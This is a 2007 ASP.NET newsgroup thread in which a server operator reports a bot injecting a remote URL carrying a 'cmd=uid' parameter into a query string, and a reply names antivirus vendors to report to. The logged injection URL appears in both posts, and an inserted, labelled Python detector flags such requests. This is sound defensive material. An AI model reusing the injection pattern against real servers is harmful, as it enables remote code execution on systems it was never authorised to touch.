start date: Tue, 14 Aug 2007 08:13:22 -0700,
posted on: microsoft.public.dotnet.framework.aspnet
OT: Where to Report Source of Virus?
My question: is there some sort of authority I can report this to? If so,
who? I have a URL directly to a virus-infected file that's getting spread
around on the Internet.
My situation is this: I have a Web server (hosted at a commercial data
center) that faces the public Internet. One of my customer's Web sites has
recently been the subject of some sort of attack - I'm not sure how to
categorize it. The attacker (apparently a spider named lwp-trivial)
substitutes a URL to an otherwise valid query string, then submits the
request. The following is from my centralized error logging routine that
logs all exceptions not otherwise handled:
<RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&cmd=uid</RawURL>
<UserAgent>lwp-trivial/1.40</UserAgent>
NOTE: Everything in the RawURL is legitimate up to and including "memberID=".
After that, it's whatever the bot substituted in place of legit values.
I have changed the real domain name and file name in the above request for
purposes of posting here.
I entered the above bot-injected URL directly into my browser and
immediately Norton AV detected a virus.
Thanks.
Date:Tue, 14 Aug 2007 08:13:22 -0700
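A detection sketch for the request pattern logged in the post above, added here as an example and not part of the original thread: it flags logged requests in which a query-string parameter's value is itself an absolute URL. The log layout is assumed to be the RawURL/UserAgent pairs shown in the post; the second and third sample records and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in the shape of the log entry quoted in the post.
# DOMAINNAME and FILENAME are the poster's own placeholders; the second and
# third records are invented (a benign request and a percent-encoded variant).
SAMPLE_LOG = """\
<RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&cmd=uid</RawURL>
<UserAgent>lwp-trivial/1.40</UserAgent>
<RawURL>/udp/UDP_01.aspx?memberID=1042</RawURL>
<UserAgent>Mozilla/5.0</UserAgent>
<RawURL>/udp/UDP_01.aspx?memberID=hTTp%3A%2F%2Fexample.invalid%2Fa.txt%3F</RawURL>
<UserAgent>lwp-trivial/1.40</UserAgent>
"""

RECORD = re.compile(r"<RawURL>(.*?)</RawURL>\s*<UserAgent>(.*?)</UserAgent>", re.S)
# A parameter value that is itself an absolute URL (scheme://...).
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

def url_valued_params(raw_url):
    """Return (name, value) pairs whose decoded value starts with a URL scheme."""
    _, _, query = raw_url.partition("?")              # everything after the first '?'
    pairs = parse_qsl(query, keep_blank_values=True)  # splits on '&', percent-decodes
    return [(k, v) for k, v in pairs if URL_VALUE.match(v)]

def scan(log_text):
    """Return one finding per logged request carrying a URL-valued parameter."""
    findings = []
    for raw_url, agent in RECORD.findall(log_text):
        hits = url_valued_params(raw_url.strip())
        if hits:
            findings.append({"path": raw_url.strip().partition("?")[0],
                             "user_agent": agent.strip(),
                             "params": hits})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        for name, value in f["params"]:
            print(f'{f["path"]}  {name}={value!r}  UA={f["user_agent"]}')
```

Matching on the decoded parameter value rather than on the user agent keeps the check working when the client string changes or the URL is percent-encoded.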
Re: Where to Report Source of Virus?
Virus Scanner tool providers such as F-Secure or Symantec are such
authorities. For example:
http://www.f-secure.com/security_center/sample_submit.html
However, if their products already detect the virus, I think there's no need
to inform them. There are also security etc. related email lists etc. where you
can spread information.
--
Teemu Keiski
AspInsider, ASP.NET MVP
http://blogs.aspadvice.com/joteke
http://teemukeiski.net
"Smithers" wrote in message
news:OHlHnWo3HHA.4476@TK2MSFTNGP06.phx.gbl...
> My question: is there some sort of authority I can report this to? If so,
> who? I have a URL directly to a virus-infected file that's getting spread
> around on the Internet.
>
> My situation is this: I have a Web server (hosted at a commercial data
> center) that faces the public Internet. One of my customer's Web sites has
> recently been the subject of some sort of attack - I'm not sure how to
> categorize it. The attacker (apparently a spider named lwp-trivial)
> substitutes a URL to an otherwise valid query string, then submits the
> request. The following is from my centralized error logging routine that
> logs all exceptions not otherwise handled:
>
> <RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&cmd=uid</RawURL>
> <UserAgent>lwp-trivial/1.40</UserAgent>
>
> NOTE: Everything in the RawURL is legitimate up to and including
> "memberID=". After that, it's whatever the bot substituted in place of
> legit values.
>
> I have changed the real domain name and file name in the above request for
> purposes of posting here.
>
> I entered the above bot-injected URL directly into my browser and
> immediately Norton AV detected a virus.
>
> Thanks.
>
Date:Tue, 14 Aug 2007 20:47:03 +0300